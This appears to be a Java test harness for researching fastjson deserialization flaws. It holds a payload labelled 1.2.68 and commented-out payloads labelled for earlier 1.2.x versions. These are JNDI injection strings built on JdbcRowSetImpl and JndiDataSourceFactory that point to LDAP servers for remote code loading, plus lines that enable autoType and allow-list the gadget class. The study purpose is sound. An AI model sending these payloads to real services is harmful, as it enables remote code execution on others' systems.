package com.llu.vul;


import com.alibaba.fastjson2.JSON;
import com.alibaba.fastjson2.JSONObject;
import com.sun.rowset.JdbcRowSetImpl;
import org.apache.ibatis.datasource.jndi.JndiDataSourceFactory;

/**
 * Local harness that hands one JSON test string carrying {@code "@type"} keys to
 * {@link JSON#parseObject(String)} and prints whatever the parser returns.
 *
 * <p>The commented-out strings in {@link #main(String[])} are earlier samples kept for reference.
 * The version numbers beside them are the author's labels (presumably the fastjson 1.2.x release
 * each sample was checked against; confirm before relying on them).
 *
 * <p>NOTE(review): this file imports {@code com.alibaba.fastjson2}, while the samples and the
 * commented-out {@code ParserConfig} snippet are written in fastjson 1.x terms. fastjson2 documents
 * autoType as off unless it is explicitly enabled, so the call below is expected to yield a plain
 * {@link JSONObject} in which {@code "@type"} is just another key. Verify this against the
 * library version actually on the classpath before drawing conclusions from a run.
 *
 * <p>For code that parses untrusted JSON: leave autoType disabled, and on fastjson 1.x enable
 * safe mode ({@code fastjson.parser.safeMode}) rather than maintaining type deny/allow lists.
 */
public class FastJsonVulTest {

    /**
     * Builds the sample that is currently active (labelled 1.2.68 by the author).
     *
     * <p>Entry {@code "1"} repeats the {@code "@type"} key (first {@code java.lang.Exception},
     * then {@code com.llu.vul.ThrowableTest}); entry {@code "2"} names
     * {@code com.sun.rowset.JdbcRowSetImpl} with a loopback LDAP data source name.
     *
     * @return the JSON text, lines joined with {@code '\n'} and no trailing newline
     */
    private static String activeSample() {
        // Trailing blanks after some commas are part of the original text and are kept as-is.
        return String.join("\n",
                "{",
                "    \"1\": {",
                "        \"@type\": \"java.lang.Exception\", ",
                "        \"@type\": \"com.llu.vul.ThrowableTest\"",
                "    }, ",
                "    \"2\": {",
                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", ",
                "        \"dataSourceName\": \"ldap://127.0.0.1:1389/g0tvin\", ",
                "        \"autoCommit\": true",
                "    }",
                "}");
    }

    /**
     * Sets one system property, parses the active sample and prints the parsed object.
     *
     * @param args unused
     */
    public static void main(String[] args) {
//        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
//                "\"DataSourceName\":\"ldap://192.168.142.129:8085/YMLGKzIJ\"," +
//                "\"autoCommit\":false}";
        // Original note: "recursively called" (refers to the wrapped type names below).
//        String s = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        String s = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        1.2.43
//        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://192.168.142.129:8085/JQwoRjuX\",\"autoCommit\":true}";
//        String s = "[\n" +
//                "    {\n" +
//                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\",\n" +
//                "        \"dataSourceName\": \"ldap://192.168.142.129:8085/JQwoRjuX\",\n" +
//                "        \"autoCommit\": true\n" +
//                "    }\n" +
//                "]";
//        String s = "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://127.0.0.1:1389/g0tvin\",\"autoCommit\":true}";
//          1.2.45
//        String s = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"ldap://127.0.0.1:1389/g0tvin\"}}";

//          1.2.47
//        String s = "{\n" +
//                "    \"1\": {\n" +
//                "        \"@type\": \"java.lang.Class\", \n" +
//                "        \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\n" +
//                "    }, \n" +
//                "    \"2\": {\n" +
//                "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \n" +
//                "        \"dataSourceName\": \"ldap://127.0.0.1:1389/g0tvin\", \n" +
//                "        \"autoCommit\": true\n" +
//                "    }\n" +
//                "}";
//        1.2.48
        // Original note: "turn off the safeMode feature".
        // NOTE(review): the property written here is fastjson.parser.symbolTableSize, whereas
        // fastjson 1.x's safe-mode switch is fastjson.parser.safeMode, so this line does not
        // appear to touch safe mode. Confirm what it was meant to do.
        System.setProperty("fastjson.parser.symbolTableSize", "0");

        //{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://127.0.0.1:1389/g0tvin","autoCommit":true}
//        Set autoType to true
//        System.setProperty("fastjson.parser.autoTypeSupport", "true");
//        // Configure the deserialization allow-list // add an allow-list entry
//        ParserConfig parserConfig = new ParserConfig();
//        parserConfig.addAccept("com.sun.rowset.JdbcRowSetImpl");
        // 1.2.68
        final String payload = activeSample();

        // Single-argument overload: no reader features or target class are passed in.
        final JSONObject parsed = JSON.parseObject(payload);
//        new JndiDataSourceFactory()

        System.out.println(parsed);
    }
}
